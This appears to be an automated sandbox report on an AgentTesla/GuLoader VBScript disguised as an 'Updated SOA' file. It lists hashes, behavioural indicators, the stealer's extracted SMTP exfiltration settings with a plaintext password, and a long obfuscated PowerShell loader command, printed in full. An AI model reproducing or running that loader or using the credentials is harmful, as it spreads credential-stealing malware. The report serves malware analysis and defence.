agenttesla | 424cb7300a7e85cf954f69a595b51bc97e1136cea43a20998e2d79ce3a85dcaf

General

Target

FESCO - Updated SOA 2301303084.vbs
Size

414KB
MD5

a8c7f9007a7bf03c02295d13a2fba1aa
SHA1

6f0d1e8217091e9df4b9c1a65024dfb9a641d1b2
SHA256

0dcabaa6cc8989400ef065854a8167a969b7cdaa5e766ecc706a8e55f10ab03e
SHA512

ad3a0baa23def4a73a67f1843cfcef9ec8018fbbb8bc780a2857b627eb3775732b181d34d5501a499099940d8d5c78600ce2af11b39104a15cb7b4dcecdf9b04
SSDEEP

6144:PJXPy/W1U13vrimaqXrHkJRNM7j4ECOw9R21wSpFtFsC4qScICZ3G15UtGC5Ty2:FPy+1e3jilmSNMfO9RuV7tFs7cIf1WFV

Score

10^/10

agenttesla guloader collection downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
Smtp.ionos.co.uk
Port:
587
Username:
[email protected]
Password:
PJaccident@2020
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

2 1284 WScript.exe

flow	pid	process
2	1284	WScript.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

caspol.exe

pid process

1796 caspol.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

1732 powershell.exe
1796 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1732 set thread context of 1796 1732 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

856 powershell.exe
1732 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1732 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.execaspol.exe

description pid process

Token: SeDebugPrivilege 856 powershell.exe
Token: SeDebugPrivilege 1732 powershell.exe
Token: SeDebugPrivilege 1796 caspol.exe

pid	process
1796	caspol.exe

pid	process
1732	powershell.exe
1796	caspol.exe

description	pid	process	target process
PID 1732 set thread context of 1796	1732	powershell.exe	caspol.exe

pid	process
856	powershell.exe
1732	powershell.exe

pid	process
1732	powershell.exe

description	pid	process
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	1796	caspol.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1284 wrote to memory of 856	1284	WScript.exe	powershell.exe
PID 1284 wrote to memory of 856	1284	WScript.exe	powershell.exe
PID 1284 wrote to memory of 856	1284	WScript.exe	powershell.exe
PID 856 wrote to memory of 1732	856	powershell.exe	powershell.exe
PID 856 wrote to memory of 1732	856	powershell.exe	powershell.exe
PID 856 wrote to memory of 1732	856	powershell.exe	powershell.exe
PID 856 wrote to memory of 1732	856	powershell.exe	powershell.exe
PID 1732 wrote to memory of 1796	1732	powershell.exe	caspol.exe
PID 1732 wrote to memory of 1796	1732	powershell.exe	caspol.exe
PID 1732 wrote to memory of 1796	1732	powershell.exe	caspol.exe
PID 1732 wrote to memory of 1796	1732	powershell.exe	caspol.exe
PID 1732 wrote to memory of 1796	1732	powershell.exe	caspol.exe

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FESCO - Updated SOA 2301303084.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Buncombes = """DuFNeuFonBacKotKaiKnoSyngi GrTLiwEniPlsFitPritrlInyfo0Tr0Zo Fa{RepReaScrTuaShmSu(Sy[MoSHutPrrHyiainhogVe]Re`$StEMimmebRioSawUneSplDolAfeflrLo)Mi;ScFFooKirSm(Ho`$BrPTolSouCrtEjaEprShcAlhAliWaaStnSa=St2Un;Es Pr`$ArPSclRiuBotSuaInrSycDihAdiGraSynBu En-splphtOp Ho`$GeEGemAlbPeoSpwDeetrlkilskeMarFr.BuLAfeManTagVotFohEn-Ha1po;No Fi`$amPKalTiuCutReaBrrLicBehHeiDiaelnCa+Pa=ar(Fu2Au+Zy1De)do)Fo{No`$ElKCoeCeaJatKd Op=zw St`$FoKLaeNiametEp Em+Ma He`$GlELimMibAnoWhwSteSalRilAkeNerCr.ReSMeuEvbAnsKntBurKriTrnOxgUn(Al`$PiPDelSquSptUnaKlrBecPhhXriAraDanFo,sc Ge1Ja)Ti;Un}St`$UdKSteLiaFetOr;Ch}Dr`$UpTRowIliStsAttTeiBrlKiyHy0Br2My Wi=We GlTGewheiOesGytOmiMolPhyMd0Sp0Ge Gi'UnPOerGaIbiEFikCanAnEFopElvUnTReaSooSeCAuaRakPrFBrlBieEmRSiePo-VeBfluNoEUnCOprGyxInRTheHepUnESulSurFuASpfGeeudRInoFlsMaEHyfSosStPUnaEkigiCSeaGuodiPPorbonRiWshegn Fa'Lu;Dr`$NiTmiwUdiKasFntKmiSklHayNe0Se1Tr Fi=ad ArTArwStiFosprtLeiShlPhyle0Ud0Ar Au'ViBBiaPr`$PlJFeeUnPnaSblkAdeWhPOriSkzHeLEnrWriGeDPeeHozAkTKosWeiTsCBlhBrfVaKStuDooHaCKlhSprOvLReaBemUpNReoHa[SuRHynOp`$VeRAleGaPCoICenValEdfinrInuEvBAloRetVaBHoaSaaDaAklnMorAuKRelGrcHoSBetFahArAInsAgiEnSSuuStaEnUKinAinFeRAvrTe/UnAOplSt2GeuPonPe]PuDHjeMi spMHaaBr=KoHEtoKe kiVKaiAp[UnSAltLocKvGEnlUnoAuFUnaminDiDKiiSvvBiPScohleTukRauCorStRAleBltMuCWioTa]LoLNobSa:SeCInhHa:EmASpgSeTmeAennBeoSfFOviunBThSseeHeyObGPraSttBaFFojPaeSiLApeGl(NoLBaiRe`$StBSwaPlEInHMaePrmDePPauBabMaLStabiopyTRooSlwOmFRuoOpeBaNHuoDilPrLLiiCylMoUXidBaeMjMAnaDirQuSefaFi.MuSDykVaSPeRNaePouNabOsrStbBrmMaeSosRiSKalFrtExSMakBurChDPuiSeiCeDLerBenjoRTeuAdgblKFidKl(CoFTrjMe`$KoBLeeSpPVeOeknTrlNotSoiInuMiTInaDetLeSIntSkaQuJzaeBarPuRFeuHecMiNKooEkhIdSslcFliTrNGaeAlaHaOAscranFaCdoaDa,HiFPtuTy ReSpekTr2MiDDioSu)InHMyiEp,StZNaiPl auFUnlNo1AbISenFr6FoIMunBy)EsANambl Ju'Af;BaFSauBrnTrcmitFeiUnoLanUn CeHBeTKoBRe Tu{HapEnaNerMaabemSt(Un[peSRetPorDeivenPagIn]pa`$SiEVimDibDoochwSyeAflAslUdetarSo)Bo;Br`$NyPTreExzMgiPhzTriRefMuoUnrInmCa Ch=Po CaNTeeKrwWa-UnOlubFejDeeFacSitNd SybReyKatineVa[Ya]Ca St(Sk`$InEQumStbFioOdwOveMalSelDeeRnrpr.YeLSaeStnLagAnttihDe Ge/Ir ju2So)Ou;TeFBaoTorVi(Ph`$NePSklPouVotGeaHerAdcMohCaiFoaFonBe=Fo0Le;Pl Di`$ToPPalreuFrtFoaEtrHucgehBriCraRdnCa Un-SslshtKb bu`$CrEAnmPabReoQuwOpeRelDilSveForAu.HeLNeeFrnOugIntLjhDe;No Vi`$HaPNilanuRetFoaDirGicCahBeiTracunEb+Vi=Re2un)sl{is.Ov(Ja`$VeTHawNeiPrsegtGyiSplInyUe0Ov2Rw)Un Vi`$FoTMuwPeiPasOvtYoiCalBuyou0Ro1Vr;Pa`$hoPSieAfzJuiPezMeiabfInoRerUnmMa[In`$UnPHolGeuPrtBeaMorsocMahCiiLyaFlnSo/Su2Cl]Ab Ph=Kn Re(In`$KuPSkeCazExiEnzSciCofDroHarFomRo[so`$OmPBelInuDatPeaRerSkcSthbriBoaManPe/Ge2Qu]Fi Ba-WebstxSpoLerLi Cr4So1no)Ab;Hj}Va[UdSUgtDirTeipanOpgMi]Cu[NoSFoyRusDitSpeUdmSo.SiTcheCoxAstIc.LdEOxnJacDooKidTriDinNegLa]ka:Ar:ScAnoSAnCFoITrILa.NeGEneDutGrSCatHyrGsiSunGagXi(Or`$NoPAuePizOdiAmzStiHofScoSirFomCa)Eu;cl}Me`$SnUTvdFeskotEvaTvfGefYeeSurPoeNo0vh=AfHSuTMnBSk He'Pr7CoAMa5br0Be5SkAAl5CrDfo4suCKi4en4Fa0An7Ha4LeDGl4Un5Ma4Sl5Ud'Lu;Ya`$FaUMadRhsSatpraKrfSofSpeGrrSkeFl1Ov=ImHKaTClBUd Ti'ka6As4Re4As0Co4PaAMa5KoBSt4Un6Ep5giAfr4ne6Be4UmFun5ToDBe0De7Sm7ToEEs4ul0Re4Lo7He1OvAFi1TrBRi0jr7Na7YaCVi4Fo7Ep5PaARi4be8Ar4EdFRa4OsCAr6un7mo4Pr8Vi5OvDar4Re0Co5LeFLu4ImCpr6Ki4Sl4StCTh5FoDTo4Rh1Ga4Di6Wa4caDSa5PeANo'Sk;Sy`$RaUTedRisTstMeaFofVefFaeSornoeSe2Mo=LvHBeTChBBl Na'Fe6PiESc4TrCKa5BiDIn7Ve9Pa5FeBDa4No6In4WyACa6Bl8Un4WoDPe4SkDTr5ReBOv4UdCFe5FaAFi5InATh'Di;An`$HoUTedBosrhtInaImfFofSceMermaeHo3Pa=PhHFlTInBUn Sm'Ov7udAHe5St0Se5ExASo5DiDDr4PoCGe4An4Ir0Di7Be7KrBUn5BoCLu4Ir7Un5arDAn4Tv0pa4Pa4Se4OvCUn0Br7li6An0de4Dr7Wa5SyDBe4BaCCh5RoBJu4Ou6Da5Af9Va7CoAAa4UnCMe5zuBBn5biFPe4Mi0Ba4FoAHe4TrCIn5MeALf0ha7Be6Lo1Bo4Ma8Na4Ba7Sk4KrDKe4En5Be4BaCht7VrBAn4CuCDi4afFUf'Ri;Pu`$SaULadResbitScaTefSufMaeNarCoePh4va=AnHLyTSoBKl Co'de5YnASp5RiDNu5SuBMe4To0Ac4Sk7Od4PrEBa'Un;Un`$TeUFodSnsFltInaSufTefAreHirFoeKa5Un=AdHReTImBAr Sh'Un6UrEUn4SaCMu5InDPr6Ti4Fu4Fl6Sc4HeDHy5TrCRe4Cl5Is4OuCSt6Th1Ma4Fo8Qu4Bi7Bi4ScDIg4He5Fe4tuCOt'Bo;Si`$AsULddTrsTttInaanfObfAneBlrCaeKr6Jo=CoHEjTGlBOu On'Fe7MoBVi7UdDAr7DiACo5Pe9St4PeCUn4AtASk4Th0Ca4Mi8pi4Re5Ur6Kl7Pr4un8Af4Fo4Ge4MeCRe0Sh5Du0Be9Un6ab1Di4Pr0Hy4DrDAf4SnCTr6PaBSk5Pr0El7ViASr4Sk0Co4AlERe0Sa5Ve0Ep9kv7Op9Hu5MiCAl4AuBPa4De5Bi4Ve0Di4OpABi'Am;Un`$UdUAudUpsButGnaEmfAsfMaeYnrMiesp7Un=MaHLeTKoBSe Al'Un7ChBEg5SyCQu4Pr7Bu5FlDla4pa0Or4Em4Ye4UuCMe0Ma5Ve0Fl9sp6pi4Ri4Im8Ne4Tr7Ko4Pr8Po4DiECh4UnCOv4UpDSt'Ro;Re`$BeUKadMisRetUnaKifHufnoeEfrCoeHi8Ka=ApHplTAuBin he'Je7VeBEl4StCFa4FoFSk4sa5Ve4BaCPe4FoAEd5KoDfi4KeCIn4SaDNe6FrDWi4orCUd4Ab5bo4OpCEf4UdERu4Li8Su5SpDAf4BrCAm'Be;Au`$MuUOpdUdsFitbuaPrfSufSkeGarDeeRe9Ch=AfHUfTAfBGe Gr'Hy6Pa0St4El7Se6mi4Dr4PoCMa4Sk4Ma4Pu6Cy5ElBKl5br0Ov6Ba4Cy4Fo6Tr4BiDFr5JuCMi4In5Bi4kvCGa'ba;He`$BihCoaAnrDelBeeReqDeuTiiHanUniFicUn0Ic=AmHSaTSkBtr Tu'Br6Mi4Gy5He0Zo6ChDFj4TeCUn4Al5Mo4SqCSi4AfETa4Pu8Gu5coDKp4SuCBa7UnDOp5Ac0Gr5Di9Lr4LoCAl'Ca;To`$RehUdaOurTelcheBuqLauFriPlnHeiPacVi1Ph=MoHCiTTrBSo Ju'Ma6DaAhe4Vo5Re4Ho8Vo5TeAUn5JuABa0Op5Ea0An9Ki7Po9Sj5SaCPr4OrBOp4Li5Te4Bk0Al4AlABr0Un5Be0An9ns7GuARe4EtCLe4Ed8In4Ud5An4QuCGo4CoDGe0Pr5Er0Fo9pa6Hi8Su4Hi7Hu5BaAPo4Bi0Rd6UnASp4No5Sy4En8Hy5HaAhy5hjACa0Ja5Ru0Fo9Ha6af8Ky5caCMi5StDFo4Si6To6deAPr4Bl5Pa4Ed8Af5ReADi5IrAPi'Af;pe`$elhReaSvrPllKaeSpqSvuAbiPlnFaiUncIn2Es=UnHreTglBRe Sa'Ho6Nu0Od4Ab7Ca5auFfr4Ti6De4ga2Ov4StCPa'Mi;Fu`$DihOpaVerHelReeBuqkeuOrimonBaiRecTr3Wo=BrHInTCrBSv Pr'Fr7be9Be5PrCHy4ReBGl4lu5Bo4So0Tu4DgAUn0Ti5Wi0Du9du6Ba1ce4Ga0Ar4UnDRi4MaCPh6PeBTa5Ad0Ha7EdACh4Aa0Mo4InEge0Om5Ne0Fa9Af6Ca7Ca4FoCAn5PaESa7BrAJu4Al5Re4Bo6Ci5boDBi0Fd5ro0Ov9Mi7SuFLe4Dm0Mi5SlBId5ReDTe5SuCMe4Di8Cy4Tr5Cl'Ud;Un`$dkhLiaAnrSllDaetmqDiuFoiAlnAsiRecDi4Me=ImHRaTExBPa Ea'Sv7SlFAd4Ba0he5inBDa5UnDRe5InCUn4Ba8Li4bu5Di6Pa8Do4Py5Ep4Pi5Mu4Om6Af4SiAAm'Ho;Ch`$bohKaaUnrRelSveMoqBouSaiSvnGoiArcBe5Du=DoHSaTUnBIn Pr'Op4Bu7Mo5HyDAn4HyDqu4Ex5sa4Sw5Se'Sp;Su`$VihEsaBorAslAreNoqopuAdiUnnBeiPacca6Ga=JaHEfTMeBSu Si'Te6Bk7Af5BiDDe7Fe9Ka5TrBPh4fe6Re5SaDBe4JiCSa4SeAun5FoDLi7UpFbr4Tj0Ra5EkBPa5MaDFi5PaCid4ma8Ba4Ve5Sc6Un4hj4TiCVu4St4Su4Ra6Fr5DuBAe5se0ba'wh;Sa`$WhhTiaPrrBalMoeOxqMeuKviTanBuiLicSa7Ma=flHIdTaeBBa Pu'Du6Ma0Sn6SqCUn7Po1fo'Ve;So`$EshciaSkrMalAfeBiqSyuPriDanFliEfcUn8Ud=FjHBuTArBTa Gi'ak7Ma5Fl'Vi;Ta`$omGBurWieTimstiSloCo=FeHHaTDaBFe Vi'Be7ReCSu7UnAKo6MaCSn7vaBSt1MeAFr1UtBPr'Li;Pa`$fiMByiInsPltdeubitproSkrPhsTa=InHUnTBaBOr No'Je6PaASe4Ob8Sk4Re5Fi4Be5Gg7clEfl4Gn0Br4Hy7In4siDIn4Lo6Bl5SnEAc7He9Ir5StBTu4En6Op4HyACo6Ud8Oe'Br;LafOvuChnIncEttPriAnoTinBr RefUnkSlpBr wa{JaPGuaUnrPsaGrmUn Ma(Hj`$MesVgkVarBamSteSutOu,Fo Sa`$AlPFraBeqEkuDeeBe2Mo2Ci1Co)Op Ve Fo Op Wr Gr;Gu`$MySCoyFenDieymcToiInoOpuNossj0Su Mu=VeHFjTTuBCa He'la0PiDre6Sy5Di4Ho8Ki5DaCBa4Ru7Kl4ShAEc4Jo1Ty5Kr9Op4Ti8Di4KlDFa1Di1Ga0cr9Pu1Tr4Fo0Af9be0St1Un7te2Ce6Ac8Ex5Rh9Wa5Ti9Be6PhDex4Su6na4An4Ad4Sh8Am4Ra0Fu4lo7La7He4Ba1Sk3Kk1As3Fr6RiAOv5NoCre5BaBTi5ArBTa4chCRe4ch7Gr5PiDCe6SpDce4Ce6So4si4Ak4Fj8St4Je0Ha4Ba7Ba0Ak7Le6PuEKo4LoCAn5SpDGr6Id8Sm5StAUd5FoAFr4CiCMi4Ov4El4SeBDe4Lu5Ge4Ja0Au4ToCLs5adABe0An1Af0Sn0As0Sy9Fj5Co5Fo0Po9fi7HuENo4Ba1Mi4FrCMa5stBgr4RnCTn0Re4Mi6Ve6Co4CiBRr4sh3Te4PrCFo4CiABi5MeDPe0Gl9In5Er2Ek0Ou9Ar0FrDBi7no6Bv0Di7As6InEAf4Sk5Si4To6Fi4BuBFr4Be8Im4Ri5Wh6Sp8Na5KaASa5SvATa4UnCHo4Fi4Or4TrBDi4Fu5Ba5Pa0Se6FrASu4vi8Li4CoAUn4In1De4HaCCo0Ra9Hy0Mi4Cy6Ac8Kv4Mo7Kn4AaDOp0Pa9Ut0ToDUn7Fr6Sp0Ta7Te6Ge5Ga4Be6Fe4KlARe4Fe8Fr5PrDAc4Un0He4fi6Ra4Ne7An0Wo7Ka7JiABi5Ce9Bl4Be5Ge4Sh0Ha5arDPa0Br1Se0EkDNa4Ve1De4Pr8Un5KhBCh4Sh5Mo4wiCUn5Se8Mi5AcCFi4Me0tr4Un7Ve4Om0Pa4StAGe1Ma1re0Hu0Ce7Fr2Ek0Il4Ce1Af8Be7St4Sk0An7Pr6GrCPr5Do8Op5DiCSc4He8Od4St5En5ArABr0Sw1Sp0DoDge7krCTa4UnDSe5BuAMi5BiDUr4Sk8Hg4SqFDd4LiFIn4BlCAf5FjBFu4TaCUn1Po9Pe0Aa0Hi0Ge9Ba5Ov4Si0Re0Vo0Al7Ve6SyEAn4WrCKu5SoDIn7PrDNo5Ou0sk5Ue9Hi4KlCVe0Un1Ns0DiDpr7SkCUn4HeDCi5PrASm5TrDTu4Su8Se4SaFDi4HiFAl4oxCPe5ErBNa4BeCSl1Ja8gr0St0An'Sm;Co&Im(Ne`$BrhInaFrrValAseloqGruTriPrnReiMicTi7Af)Ol Fo`$SeSSeyShnMaeSycCoiFaoInuEdsIn0To;At`$PeSCayTinAreJecBriReoSkuGrsRe5Ta Sl=Co DrHKoTVeBFr te'Pr0SoDNe6No7pr4Ku8Hy4OvBSu4ku6Kr4KyEad5FoBPl5LeCGe4Ho7Br4MeDCe4DaCKu4Me7St4InCEk5TaAGu0Do9Kr1Ki4ta0Se9Di0deDOp6Ma5Ej4St8En5UnCSl4Km7Lg4JrAKo4po1Fi5No9Ca4Ov8No4AnDPo1Ek1Fe0Aa7Ov6skESp4WrCOv5SwDth6Li4do4MoCVe5EgDDi4To1El4Br6Un4heDAl0ko1Op0PhDMo7ScCWi4TrDEn5ScAsk5DiDAt4Ki8Dv4VaFMy4AdFFa4CaCGe5PeBUn4ReCKl1NoBAn0Po5Ba0Ov9re7Ba2te7AfDGa5Sv0Va5Pr9Te4SaCHy7Ba2He7Ty4Ko7Mo4To0Kl9Gr6So9ak0Aa1Sk0CeDFe7WaCSp4ShDSt5StAHe5DeDPr4Pr8Eo4IlFRe4UnFUm4CrCHj5ObBDo4ReCTa1SpAIn0Sq5Ta0Mo9gr0FaDbe7DjCMe4FoDAa5FoAPa5SaDPr4Ca8De4plFFe4PrFDy4BeCSa5AiBCo4LoCFa1ClDCo0is0Ga0Sl0De'In;Eu&sm(Dk`$FihSgaCirHylDdePsqDeureiBansmiFocun7St)Ku Vi`$GrSDeyTenAceBlcBeiFooFlujosTu5Ka;Qu`$SeSHayFincoeRecAmiOroOruStsTh1Ti Ar=Un baHEdTSmBFe Co'Ch5KoBCo4UnCMa5CrDIm5BrCSp5DaBKr4Py7Ra0Ha9An0UdDCr6Te7sk4Pu8Fo4UnBKo4Sy6Be4JuEBo5GiBBa5FoCSe4Tr7Dr4AtDMa4SaCPe4Ma7Sm4OmCBr5SeAVa0Bo7Ex6Re0de4El7De5FiFKo4Ly6ud4St2Mu4OpCLi0Ra1Do0StDGy4Pr7ka5TeCTi4Fi5Si4Ge5St0Se5Cu0Re9Af6Re9Da0Ek1Pr7Pe2Su7WaAHa5Nd0Fa5RaAEm5PeDAq4arCTe4po4Kl0Re7Fo7PaBSe5UdCUn4Mi7Sk5EfDHj4Ve0an4Sl4Pl4SnCUd0im7Ge6ly0Ha4st7Fo5TeDSt4SyCFy5TaBSt4Mu6Da5ko9In7CyABa4AnCUn5TaBsa5ViFRi4Pi0Py4PlAWa4AlCRo5LaASk0Be7Sm6Eu1Ga4Cl8So4Ex7Su4PoDPr4Ch5Re4StCTa7MiBSy4ReCCo4HoFDi7Fo4Sv0Ga1Re6Ha7Fl4VeCGo5StEJa0St4ta6Rd6Op4AfBEs4Ri3Ap4SeCAf4spACo5ChDTa0Co9be7EjAPa5Pe0Ge5InAOv5AnDCu4BoCin4Af4Va0ad7Sl7VaBAb5FlCEc4na7Ro5IdDSc4im0Co4pr4Kn4RiCJa0Op7Mi6Kr0Ep4na7Sk5RiDMo4AiCGr5ErBKo4Do6Su5na9br7YpADu4GuCNi5UsBMa5SkFAt4Un0So4ItASv4ToCWi5gaADu0Gu7Ad6jo1Ma4Da8Id4Ko7Sl4KoDSv4Ly5Ci4StCRo7PrBSc4IdCSt4DyFIn0Te1Ta0fo1Ju6In7Ab4ClCPe5PaEOu0el4am6Ve6Ty4KeBSa4Ry3la4FiCCh4SpAAm5JeDPr0Ye9Vi6Br0Ba4Si7Sa5afDSh7Ou9By5OyDWh5ToBSw0Es0St0Fi5En0Sy9Ca0Ko1Du0SlDHo6Sk5Ma4fl8Fl5SkCNe4Gr7Ta4TrAPr4Ja1Ud5Ba9Eg4En8La4StDEp1Fo1Fu0Gr7As6TrEPo4GeCsi5ZaDbu6ci4Kv4SmCSk5AdDLa4Nt1Cu4Sp6Ko4NoDLi0Be1ch0LyDWi7SiCCa4NoDHe5HaARe5PiDsk4St8La4UdFbl4EpFNe4OmCUd5inBPa4TeCAp1PiCTr0Be0Di0Pr0Ev0Pu7Fo6Sk0Ko4Ma7Sc5AeFSi4Fo6St4Ve2Fr4SeCFi0Om1St0LaDMa4Ov7Sl5beCOm4ba5Ud4Am5ka0Ka5su0Sp9so6Up9Be0co1Ph0KiDar5UlATo4Gr2In5StBSl4Ra4Mi4UdCCi5UdDCl0Su0Po0Sn0Qu0in0Et0ti0Ke0Si5Ph0Ov9Ko0OpDom7Co9De4Ov8Ma5no8Di5PiCEp4HuCJo1FiBSk1UrBFo1Cy8Fr0Ch0Si0An0Fo'Aa;Ly&Co(Th`$BrhPhaLorBllsyeBaqKluDiiEknTriRecfa7Py)un Sc`$HaSmeyPrnIneAbcSkiKroIsuChsAd1Su;te}PifTyuFlnRecSltReiLyowenAr FuGWrDCaTti Fo{ApPBoaMorAmaIsmSh St(Tr[lePDeaburSpaBomGleFltTaeCurSv(ApPbaoAgsMoiCztUdiUdoLinSk Ob=Ny Tu0Re,be KoMBraTrnArdSkaTutJaoVorSvySp Pr=Da Io`$GaTGartiualeSo)ap]Un Hv[LeTHeyFopsteFi[Co]Co]Op Hi`$MeFAnoNirbukOmlReeKrjTonSueTrlLssSteUlnInsCo,Gu[RePDeaDarUnaSomAmeRetSeeFrrGe(SiPDooKisvaiUdtEniTroSknKa Ll=An Ph1In)po]An Us[slTbuyRepPheDo]Tr Na`$OrUOvnStwFieshaSmrReyMe Ti=Se In[SeVVeoLaiBedTe]Wy)wa;Di`$SlSAlySunJaeShcHniAroStuhysSi2Al Re=St AnHFiTMaBFo Re'St0snDSh7StCRe4SoDGu5LaFEa4Id0em4An2Tr4Je5da4Ln0Fu4Ma7Vi4DiELi5SkAHa4St5Fo5OvBPl4MaCtr0Sv9Sp1Re4in0Lo9Bh7Be2St6co8No5Tr9Br5Af9Re6PeDFo4Fo6Ka4Wa4Be4Sl8Au4No0Un4Af7Ga7Ti4Cy1Gr3Sa1Bu3Er6SaAUn5SmCUl5omBGa5LaBTu4SpCSk4Fu7br5HeDSu6moDSk4Vi6Vr4Ce4Mo4Pr8Se4Ha0Ub4Ge7Su0Mu7Jo6HaDTi4MaCOs4UdFFo4Lj0Me4Mi7Bi4HaCRe6StDTa5Ac0St4Ov7St4Or8Fo4Or4St4Ve0Vr4AfAEn6Gr8Ji5GaANo5HuABa4AnCSe4Mu4Ag4SvBIn4Sk5St5Lf0De0We1Pa0Te1Sk6No7Do4ElCSk5stEFr0Al4Tc6Ep6Ri4MeBSt4Fo3Be4HeCco4KhASw5ImDMi0Po9Ri7DyAMa5An0Me5kaAVa5HeDRe4liCIn4St4Ec0Br7In7SyBFo4SaCMo4KlFHa4An5Su4ThCDi4scABr5CoDOv4An0Va4Un6im4Ad7Gf0Le7Gy6Co8Br5NeAPo5HeAKo4ToCSc4Cl4Ae4InBTr4Cu5By5Es0Re6As7Le4zy8ep4Dk4Tr4SkCPe0Ad1Ba0SmDEs7SoCAf4DeDOv5udADa5elDCa4De8Pa4ZmFDi4EpFja4BoCPr5EfBNo4CyCco1Ma1Br0Mi0ta0Be0Ps0Bl5Po0St9In7Sk2Hm7SuARa5Ne0St5AlACl5BoDPo4BaCCo4Sp4Ma0Ta7Bi7FoBPa4skCEs4SyFPa4Ba5Se4orCSp4RuASt5PeDSg4Di0So4Me6Re4Tj7Be0Bl7Pa6ZaCco4Ca4Si4Co0Ea5PaDLo0St7St6Ba8Fu5ViARe5TiAVe4AdCPi4No4Se4DoBUn4Ta5Oo5Pl0Pr6CoBVr5MyCAl4Ou0Re4Tr5Dr4RiDPy4SkCEu5AfBCo6ge8Ge4UnASc4ZaAFo4TrCTr5LiAFi5ChAHv7le4st1ek3Sk1ln3Va7MiBLo5FiCEx4De7vi0Mu0Ln0Ba7En6VeDNu4stCMi4FoFBr4Du0Bo4Hi7Co4ReCUn6UtDUn5Sc0Un4Ca7He4tv8Sr4Qu4Br4Eq0Ho4CaAFi6Ba4Bl4na6Be4InDBe5HeCbe4Aa5Re4ImCNo0Dn1Br0JaDfa7CaCTr4HoDDi5AdAMe5boDEn4Il8Hu4MiFSp4HyFSa4CoCAf5BrBli4EnCri1Gu0Al0Pi5Hu0no9Ne0BiDFo4unFSp4Re8Er4Ca5me5MoAAs4ReCov0Su0Uv0Br7Gu6CoDAn4FeCPh4KkFEv4De0Te4Am7wa4AnCAf7prDSu5dr0Jo5He9Ud4CoCLe0Mr1Dr0anDco4Fo1Te4Hy8Po5ClBMu4Kl5Cy4kuCPa5Ba8Ba5tiCNo4Ac0is4Ca7st4Re0Dr4ObAEn1Ma9Me0Bo5Tu0Ex9un0EnDEk4Do1So4Be8Ko5EmBHe4Cu5Po4SpCSo5It8Su5BoCMa4Pa0Pl4Me7Ki4Qu0Ry4ExAPo1Ba8Vi0Bn5st0Pe9Fo7Br2Ta7NuATh5Mi0Ad5UnACy5IcDSu4BaCSi4La4Po0Br7St6Be4Ka5nyCBr4Ov5He5UdDSk4Po0Cr4HeASl4Fo8Po5LaAAg5CyDFi6RaDDe4MeCme4Ch5un4JeCLi4SlEBi4Mi8Ex5DeDRu4VoCGr7Ar4Re0br0Be'Dy;su&co(He`$MihZoaBerPelOveLeqEmumeiInnFeiPrcAc7Fe)To el`$enSPayBunImeLucFoiHaoXyuStsAd2Ty;Po`$DjSAnyBenMiepocAniSeoAnuGasTo3Un Sq=Pi feHDeTPeBMo 